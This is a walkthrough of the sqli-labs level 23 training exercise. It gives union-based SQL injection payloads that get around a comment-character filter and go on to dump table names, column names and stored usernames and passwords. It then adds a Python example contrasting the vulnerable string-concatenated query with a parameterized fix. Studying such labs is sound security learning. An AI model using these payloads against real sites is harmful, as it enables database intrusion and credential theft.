sqlilabs 23

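This level is an odd one: the trailing comment characters -- and # are both filtered, so the statement has to be closed with a single quote instead. Content inside single quotes is not executed, so an and clause is used to close it: ?id=1' and '1'='1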

Test which columns are echoed: ?id=-1' union select 1,2,3 and '1'='1 The message displayed is your login name:2 your password:1

So work from the 2 position of select 1,2,3.

?id=-1' union select 1,database(),3 and '1'='1 returns the database name security

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 and '1'='1 dumps the table names

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 and '1'='1 dumps the column names

?id=-1' union select 1,(select group_concat(username,password) from users),3 and '1'='1 retrieves the data
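
Why the comment filter does not stop any of the above, and what does: an added example, not the lab's own code, that puts a comment-stripping lookup beside a parameterized one and runs the page's echo test against both. The query shape, function names and sample rows are assumptions, and SQLite stands in for the lab's MySQL.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows standing in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return db

def strip_comments(value):
    # The blocklist described above: delete '#' and '--' from the input.
    return re.sub(r"#|--", "", value)

def lookup_filtered(db, user_id):
    # Weak: the filtered value is still concatenated inside the quotes
    # (query shape is an assumption), so a quote in the input ends the literal.
    sql = "SELECT * FROM users WHERE id='" + strip_comments(user_id) + "' LIMIT 0,1"
    return db.execute(sql).fetchone()

def lookup_parameterized(db, user_id):
    # Hardened: the value is bound as data and never parsed as SQL.
    return db.execute("SELECT * FROM users WHERE id = ? LIMIT 0,1",
                      (user_id,)).fetchone()

def demo():
    db = make_db()
    probe = "-1' union select 1,2,3 and '1'='1"  # the page's echo test
    return {
        # Third column is 1 because  3 and '1'='1'  is evaluated as a boolean.
        "filtered": lookup_filtered(db, probe),
        "parameterized": lookup_parameterized(db, probe),
        "normal": lookup_parameterized(db, "1"),
    }

if __name__ == "__main__":
    for name, row in demo().items():
        print(name, row)
```

The filtered lookup returns the injected row with 2 in the name column and 1 in the password column, matching the output seen above, while the bound parameter returns no row for the same input.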